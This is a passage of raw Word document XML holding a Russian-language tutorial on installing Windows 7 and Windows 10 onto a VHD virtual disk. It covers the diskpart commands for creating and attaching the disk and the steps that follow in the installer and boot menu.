      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:firstLine="567"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="outset" w:sz="12" w:space="0" w:color="FFFFFF" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>create vdisk file=”D:\OS7.vhd” type=fixed maximum=25600</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:firstLine="567"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="outset" w:sz="12" w:space="0" w:color="FFFFFF" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>select vdisk file=”D:\OS7.vhd”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:firstLine="567"/>
        <w:textAlignment w:val="baseline"/>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="outset" w:sz="12" w:space="0" w:color="FFFFFF" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="000000"/>
        </w:rPr>
        <w:t>attach vdisk</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:firstLine="567"/>
        <w:textAlignment w:val="baseline"/>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:noProof/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="1759350" cy="1280497"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="27738" name="Рисунок 5" descr="Последовательность вводимых команд">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следовательность вводимых команд">
                      <a:hlinkClick r:id="rId135"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId136" cstate="print"/>
                    <a:srcRect l="7468" t="3623" r="8613" b="15125"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1761711" cy="1282216"/>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В каждом отдельном случае отличаться будут только вторая и третья команда.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:firstLine="567"/>
        <w:textAlignment w:val="baseline"/>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="a9"/>
        </w:rPr>
        <w:t>Первая команда</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="a9"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="a9"/>
        </w:rPr>
        <w:t>diskpart</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="a9"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:t xml:space="preserve"> – применяется для вызова утилиты управления дисками компьютера.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:firstLine="567"/>
        <w:textAlignment w:val="baseline"/>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="a9"/>
        </w:rPr>
        <w:t>Вторая</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="af3"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>это команда создания виртуального диска</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:t xml:space="preserve">. Значением </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="a9"/>
        </w:rPr>
        <w:t>”D:\OS7.vhd”</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:t xml:space="preserve"> мы создали </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:i/>
          <w:iCs/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>VHD</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:t xml:space="preserve">-файл на диске </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:i/>
          <w:iCs/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>D</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:t xml:space="preserve"> компьютера. Значением </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="a9"/>
        </w:rPr>
        <w:t>type=fixed</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:t xml:space="preserve"> мы установили виртуальному диску </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="af3"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>фиксированный тип</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:t xml:space="preserve">. Если нужен динамически расширяемый тип виртуального диска, вместо </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>type=fixed</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:t xml:space="preserve"> необходимо ввести </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>type=expandable</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:t xml:space="preserve">. Значение </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="a9"/>
        </w:rPr>
        <w:t>maximum=</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>25600</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:t xml:space="preserve"> – это размер создаваемого виртуального диска в </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:u w:val="single"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>мегабайтах</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:t xml:space="preserve">. Наш случай тестовый, потому выбран минимальный объем – всего лишь </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:i/>
          <w:iCs/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>25600 МБ (25 Гб)</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:t xml:space="preserve">. К следующей команде необходимо приступать после того, как будет успешно выполнена эта. Нужно дождаться </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:u w:val="single"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>100%-ного</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:t>завершения процесса создания виртуального диска.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:firstLine="567"/>
        <w:textAlignment w:val="baseline"/>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="a9"/>
        </w:rPr>
        <w:t>Третья</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:t xml:space="preserve"> – команда выбора виртуального диска. В каждом отдельном случае отличаться будет только путь </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="a9"/>
        </w:rPr>
        <w:t>VHD</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:t xml:space="preserve">-файла. В нашем случае это, соответственно, значение </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="a9"/>
        </w:rPr>
        <w:t>”D:\OS7.vhd”</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:firstLine="567"/>
        <w:textAlignment w:val="baseline"/>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="a9"/>
        </w:rPr>
        <w:t>Четвертая</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:t xml:space="preserve"> – команда присоединения виртуального диска </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="af3"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>(его монтирование в систему)</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:firstLine="567"/>
        <w:textAlignment w:val="baseline"/>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:t xml:space="preserve">После того, как виртуальный диск будет успешно присоединен, окно командной строки можно закрыть. Вернемся в меню выбора раздела для установки системы, здесь нужно нажать кнопку </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="a9"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="a9"/>
        </w:rPr>
        <w:t>Обновить</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="a9"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:t>.</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759350" cy="1301329"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="27739" name="Рисунок 6" descr="Обновить">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бновить">
                      <a:hlinkClick r:id="rId137"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId138" cstate="print"/>
                    <a:srcRect l="9057" t="3846" r="9482" b="15769"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1759350" cy="1301329"/>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 xml:space="preserve">После этого в числе разделов диска появится незанятое место с размером созданного нами виртуального диска. Выбираем это незанятое место, игнорируем уведомление, что Windows якобы не может быть установлена на такой раздел, и жмем </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="a9"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="a9"/>
        </w:rPr>
        <w:t>Далее</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="a9"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:t>.</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795350" cy="1355313"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="27740" name="Рисунок 7" descr="Виртуальный диск">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иртуальный диск">
                      <a:hlinkClick r:id="rId139"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId140" cstate="print"/>
                    <a:srcRect l="9394" t="3191" r="9300" b="14894"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1795350" cy="1355313"/>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Далее пойдет вполне обычный процесс установки Windows.</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711050" cy="1317600"/>
            <wp:effectExtent l="19050" t="0" r="3450" b="0"/>
            <wp:docPr id="27741" name="Рисунок 8" descr="Вполне обычный процесс установки Windows">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полне обычный процесс установки Windows">
                      <a:hlinkClick r:id="rId141"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId142" cstate="print"/>
                    <a:srcRect l="9776" t="3136" r="9925" b="14634"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1711050" cy="1317600"/>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После перезапуска компьютера увидим уже меню выбора загрузки. В нашем случае последней установлена Windows 7, потому загрузчик будет именно в ее формате.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:firstLine="567"/>
        <w:textAlignment w:val="baseline"/>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:noProof/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="1655569" cy="1216800"/>
            <wp:effectExtent l="19050" t="0" r="1781" b="0"/>
            <wp:docPr id="27742" name="Рисунок 10" descr="Меню загрузки Windows 8.1 и 10">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еню загрузки Windows 8.1 и 10">
                      <a:hlinkClick r:id="rId143"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId144" cstate="print">
                      <a:lum bright="20000"/>
                    </a:blip>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1663321" cy="1222498"/>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 xml:space="preserve">Если одна и та же версия Windows установлена и на раздел диска, и на VHD-диск, виртуальные системы будут обозначены значком с типом файла </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="a9"/>
        </w:rPr>
        <w:t>VHD</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:t xml:space="preserve"> и с указанием </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="af3"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>тома</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:t xml:space="preserve"> установки.</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528950" cy="1070434"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="27743" name="Рисунок 11" descr="С типом файла VHD и с указанием тома установки">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 типом файла VHD и с указанием тома установки">
                      <a:hlinkClick r:id="rId145"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId146" cstate="print">
                      <a:lum bright="20000"/>
                    </a:blip>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1539036" cy="1077495"/>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Проходим процедуру первичной настройки компьютера.</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588075" cy="1281600"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="215" name="Рисунок 12" descr="Процедура первичной настройки компьютера">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оцедура первичной настройки компьютера">
                      <a:hlinkClick r:id="rId147"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId148" cstate="print"/>
                    <a:srcRect l="10378" t="7451" r="11429" b="8235"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1588075" cy="1281600"/>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Установка Windows 10 на VHD-диск</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:firstLine="567"/>
        <w:textAlignment w:val="baseline"/>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:t xml:space="preserve">Процесс установки Windows 10 на VHD-диск будет точно таким же, что и в случае с версиями-предшественницами, за исключением одного небольшого нюанса. В командной строке при создании виртуального диска значение его типа – </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="af3"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>фиксированный или динамически расширяемый</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:u w:val="single"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>нужно поменять местами со значением размера.</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:t xml:space="preserve"> То есть, после пути размещения </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="a9"/>
        </w:rPr>
        <w:t>VHD</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:t xml:space="preserve">-файла сначала вводим значение </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="a9"/>
        </w:rPr>
        <w:t>maximum=</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>число_мегабайт</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:t xml:space="preserve">, затем только – </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="a9"/>
        </w:rPr>
        <w:t xml:space="preserve">type=fixed </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>(или type=expandable для динамически расширяемого диска)</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:t>. В нашем случае установка Windows 10 на VHD-диск сопровождалась такими командами в командной строке:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:firstLine="567"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="outset" w:sz="12" w:space="0" w:color="FFFFFF" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>diskpart</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:firstLine="567"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="outset" w:sz="12" w:space="0" w:color="FFFFFF" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>create vdisk file=”E:\w10.vhd” maximum=25600 type=fixed</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:firstLine="567"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="outset" w:sz="12" w:space="0" w:color="FFFFFF" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>select vdisk file=” E:\w10.vhd”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:firstLine="567"/>
        <w:textAlignment w:val="baseline"/>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="outset" w:sz="12" w:space="0" w:color="FFFFFF" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="000000"/>
        </w:rPr>
        <w:t>attach vdisk</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680150" cy="1260954"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="216" name="Рисунок 13" descr="В командной строке">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 командной строке">
                      <a:hlinkClick r:id="rId149"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId150" cstate="print">
                      <a:lum bright="40000"/>
                    </a:blip>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1680462" cy="1261188"/>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Настройка загрузки системы по умолчанию</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:firstLine="567"/>
        <w:textAlignment w:val="baseline"/>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:t xml:space="preserve">Попав уже в среду установленной системы, можем </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="af3"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>(при необходимости, конечно же)</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
